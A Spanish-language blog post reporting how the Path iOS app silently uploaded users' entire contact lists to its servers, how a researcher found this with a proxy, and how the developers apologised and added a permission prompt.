Uno de los consejos que no se nos debe olvidar a la hora de instalar una aplicación es asegurarnos que esta sólo tiene permiso a los servicios/datos que necesita para su funcionamiento. Esto es una responsabilidad no sólo del usuario, que debe proteger la integridad de sus datos, sino también o sobre todo del desarrollador y de la empresa que hace esta aplicación. Esto se complica cuando la aplicación se instala en un terminal iOS en el que no se puede configurar demasiado la lista de permisos de la aplicación.  Así cuando existe una “feature” desconocida que permite acceder a estos servicios/datos si nuestra intervención o permiso salta el escándalo.

El asunto de Path, es uno de estos casos, ya que el investigador Arun Thampi, en un intento de realizar un port de la aplicación a Mac OS X, descubrió usando un proxy para analizar las peticiones que realizaba al API, que esta aplicación accede a la lista completa de los contactos para subir todos estos datos a sus servidores sin solicitar permiso para ello.

Figura 1: Petición que envía todos los contactos a los servidores de Path sin avisar

Tras el escándalo, los desarrolladores han explicado en su blog que esto lo hacían para mejorar la experiencia de usuario y han pedido disculpas, es decir, que querían facilitar el trabajo informándonos cada vez que uno de nuestros contactos se instalaba Path para que pudiéramos agregarlo a nuestra lista de amigos sin problemas. Y en su defensa alegan que estos datos son transmitidos mediante una conexión cifrada y que se almacenan de forma segura.

Ya sabemos que el caso de Path no es un caso aislado, de hecho muchas aplicaciones funcionan así, pero entendemos que no debería pasar en aplicaciones bajo el auspicio del Apple Store donde una de sus premisas es que “las aplicaciones no deben transmitir ningún tipo de datos sin el permiso explicito del usuario “.

La nueva versión de Path ha corregido este error, solicitando permiso al usuario para poder hacer uso o no de estos contactos. Ahora antes de aceptar un usuario precavido debería leerse la politica de privacidad para saber el uso que van a hacer de estos datos.
Artículos relacionados

Otras historias relacionadas

Entradas populares